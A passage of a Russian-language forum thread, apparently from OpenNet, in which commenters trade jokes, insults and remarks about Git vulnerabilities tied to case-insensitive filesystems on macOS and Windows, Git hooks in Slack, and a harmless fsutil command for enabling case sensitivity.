Да вот хрен там. Если бы ты реально умел считать, сделал бы это все в 2009, а сейчас - махал бы всем тут факом, через старлинк какой, попивая дорогое бухлецо на своей личной яхте... ну или по крайней мере мог бы не работать до гроба жизни, ощущая себя белым человеком, если так светиться успехом счета обломно. И локация была б поприличнее, без бддлогопов "в товарном количестве".

>> Главное чтобы шеф не спалил что кошель твой.
> главное чтоб шеф не узнал про краденные тележки в Кельне.

Что еще за тележки?

Ответить | Правка | Наверх | Cообщить модератору

13. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (13), 16-Май-24, 00:55 
Я помню в одной конторе настроили хуки так что оно писало об изменениях в программе в slack (пока этот чат не стал платным для владельца). Двоякое ощущение - вроде бы и удобно для менеджмента, а вроде бы как и не очень - отвлекало немного. А ещё когда делают процесс с код-ревью и мелкими задачами, так вообще не айс.
Ответить | Правка | Наверх | Cообщить модератору

62. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (61), 16-Май-24, 16:38 
Так это обычно в отдельный канал в Слаке делают. Я это сразу в mute отправляю, намного гибче через email с уведомлениями по фильтрам только на нужное. Ну кому-то удобно, пусть читают, я ж не против.
Ответить | Правка | Наверх | Cообщить модератору

19. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –1 +/
Сообщение от Аноним (19), 16-Май-24, 02:00 
> например, используемых по умолчанию в Windows и macOS

Тот кто писал, явно не работал с macOS

Ответить | Правка | Наверх | Cообщить модератору

23. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +2 +/
Сообщение от Аноним (23), 16-Май-24, 02:19 
Ну вообще-то apfs которая используется на системном диске как раз case insensitive. Так что если ты застрял на hfs+ со своим макбуком 2008 года с авито, то с разморозочкой.
Ответить | Правка | Наверх | Cообщить модератору

28. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (28), 16-Май-24, 03:11 
А я-то думал, откуда это лишение фич прогрессом обзывают. А оно вон как, the usual suspects. Не сидится им на маке почему-то.
Ответить | Правка | Наверх | Cообщить модератору

30. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (23), 16-Май-24, 03:38 
> лишение фич

И опять ты пaльцeм в гyзнo попал 😆 Но даже не буду oбъяcнять почему, уж извольте-с.

Ответить | Правка | Наверх | Cообщить модератору

44. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +2 +/
Сообщение от нах. (?), 16-Май-24, 09:55 
> А я-то думал, откуда это лишение фич прогрессом обзывают.

это добавление. Наконец-то системе объяснили что никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то же. Это в 70м году никак невозможно было такую сложную логику уместить в 16k

Но есть нюанс...

Ответить | Правка | К родителю #28 | Наверх | Cообщить модератору

54. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (28), 16-Май-24, 13:18 
>никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то же

Всегда делаю в шелле для обхода окружений алиасы/функции вида CP, INSTALL, SH. Страдайте.

Ответить | Правка | Наверх | Cообщить модератору

58. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –5 +/
Сообщение от Аноним (56), 16-Май-24, 14:39 
Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте. Выбор макоси разработчиком такой же признак проф непригодности, как и выбор винды
Ответить | Правка | К родителю #44 | Наверх | Cообщить модератору

59. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +4 +/
Сообщение от нах. (?), 16-Май-24, 14:46 
> Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте.
> Выбор макоси разработчиком такой же признак проф непригодности, как и выбор
> винды

профпригодный подвальный пришел порассуждать о выборах разработчиков.

Тебя от канализационной трубы-то вообще кто отцепил?


Ответить | Правка | Наверх | Cообщить модератору

70. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +1 +/
Сообщение от Аноним (70), 16-Май-24, 20:44 
>  Выбор макоси разработчиком такой же признак проф непригодности

Настоящий труЪ погромистЪ должОн сидеть на коредуба с и дебьяне с крысой? Ннада так полагать? 🌚

Ответить | Правка | К родителю #58 | Наверх | Cообщить модератору

71. "Пять уязвимостей в Git, среди которых одна критическая и две..."  –1 +/
Сообщение от Аноним (25), 17-Май-24, 00:49 
Вставлю своё примечание в ваш разговор в ответ именно на это сообщение - на gentoo или arch в таком уж случае. А в целом настоящий программист? Смешно звучит. Это как у баб - настоящий мужик должен...
Ответить | Правка | Наверх | Cообщить модератору

72. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (25), 17-Май-24, 00:53 
О, а что вы скажете о пользователях айфона и маках? Полагаю именно это клиенты этого американского подделия и именно для них сей человек программирует.
Ответить | Правка | К родителю #58 | Наверх | Cообщить модератору

24. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Изя (?), 16-Май-24, 02:31 
И две смешные
Ответить | Правка | Наверх | Cообщить модератору

39. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от 1 (??), 16-Май-24, 09:25 
А вот у меня вопрос - откуда столько версий git ? Аж 7 в этой новости насчитал. Типа для каждого питона свой гит ?
Ответить | Правка | Наверх | Cообщить модератору

45. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от нах. (?), 16-Май-24, 09:56 
> А вот у меня вопрос - откуда столько версий git ? Аж
> 7 в этой новости насчитал. Типа для каждого питона свой гит
> ?

для некоторых можно и не жадничать, и использовать два - например для самого питона один а для модулей еще оди... четыре. Что мы, жадные что ли?


Ответить | Правка | Наверх | Cообщить модератору

47. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (-), 16-Май-24, 10:33 
> Уязвимость проявляется только в файловых системах,
> не различающих регистр символов

А можно это объявить фичой и не чинить? Прикольно же когда всяких маздайищков можно нагреть по первое число. Я бы с удовольствием комитнул кому-то типа поха чего-нибудь веселое.

Ответить | Правка | Наверх | Cообщить модератору

66. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (65), 16-Май-24, 18:21 
Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего. А в файлухах ненужного её можно выключить?
Ответить | Правка | Наверх | Cообщить модератору

73. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (-), 17-Май-24, 04:35 
> Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего.

Ну и какой % юзеров это делает? Вот и ответ на вопрос "сработает ли эксплойт?" :)

> А в файлухах ненужного её можно выключить?

В некоторых таки - можно. Но желающие этсамого как раз и откушают наравне с вон теми. И поделом. Ибо когда возникает неоднозначность маппинга "для удоьства" - вы таки конкретно нарываетесь по линии безопасности. Это не первый вулн и не последний. В софте это поведение неудобно учитывать. Прогеры налетали, налетают и будут налетать на этом. Они просто забывают предусмотреть такую ситуацию.

Ответить | Правка | Наверх | Cообщить модератору

93. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (93), 21-Май-24, 18:04 
Начиная с Windows 10 сборки 17107 чувствительность к регистру можно включить даже для конкретного каталога:

fsutil.exe file setCaseSensitiveInfo <path> enable

Ответить | Правка | Наверх | Cообщить модератору

55. "Пять уязвимостей в Git, среди которых одна критическая и две..."  +/
Сообщение от Аноним (56), 16-Май-24, 14:29 
> Уязвимость проявляется только в файловых системах, не различающих регистр символов...

Это же фича, а не баг

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру